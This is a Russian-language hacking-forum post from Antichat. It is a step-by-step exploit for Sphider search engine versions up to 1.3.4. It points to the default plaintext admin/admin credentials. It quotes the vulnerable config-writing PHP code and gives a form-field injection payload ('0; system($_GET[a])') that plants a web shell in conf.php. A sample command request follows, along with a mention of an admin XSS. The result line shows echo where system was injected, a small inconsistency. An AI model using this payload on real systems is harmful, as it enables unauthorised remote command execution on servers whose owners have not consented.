Форум АНТИЧАТ - [sphider] Заливка шелла

[sphider] Заливка шелла

13.12.2008, 23:47

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

Провел на форуме:
7617458

Репутация: 3965

Отправить сообщение для Dimi4 с помощью ICQ

[sphider] Заливка шелла

Powered by

<=1.3.4

В Задании 003, где требовалось залить шелл был обнаружен этот движок. роспознал я его сразу, так как у самого когда то стоял такой. Сразу же полез на локалхост посмотреть сорцы. Оказалось что довольно просто залить шелл из админки.

Логин и пасс хранять не в зашифрованом виде в
http://site.com/sphider/admin/auth.php
Дефолт:

PHP код:


		
			
    error_reporting(E_ERROR | E_PARSE);    

    $admin = "admin";

    $admin_pw = "admin";

Собственно заливка шелла
Уязвимый код:

PHP код:


		
			
if ($_index_pdf=="") {

    $_index_pdf=0;

} 

...

        fwrite($fhandle, "\n\n// Index pdf files\n");

        fwrite($fhandle,"$"."index_pdf    = ".$_index_pdf. ";");

Удобнее это делать в опере. Идем в сорс и меняем это:

Код HTML:

 <input name="_index_pdf" type="checkbox"  value="0" id="index_pdf" >

на это:

Код HTML:

<input name="_index_pdf" type="checkbox"  value="0; system($_GET[a])" id="index_pdf" >

Сохраняем настройки.
В итоге имеем:

PHP код:


		
			
// Index pdf files

$index_pdf    = 0; echo($_GET[a]);

http://site.com/sphider/settings/conf.php?a=ls -la

По иронии судьбы на том сайте что в задании прав на запись не хватало.

Также в админке есть xss. Но пользы мало, так как мы уже в админке).

__________________

BlackHat.

MoDL

Последний раз редактировалось jokester; 15.11.2009 в 14:04..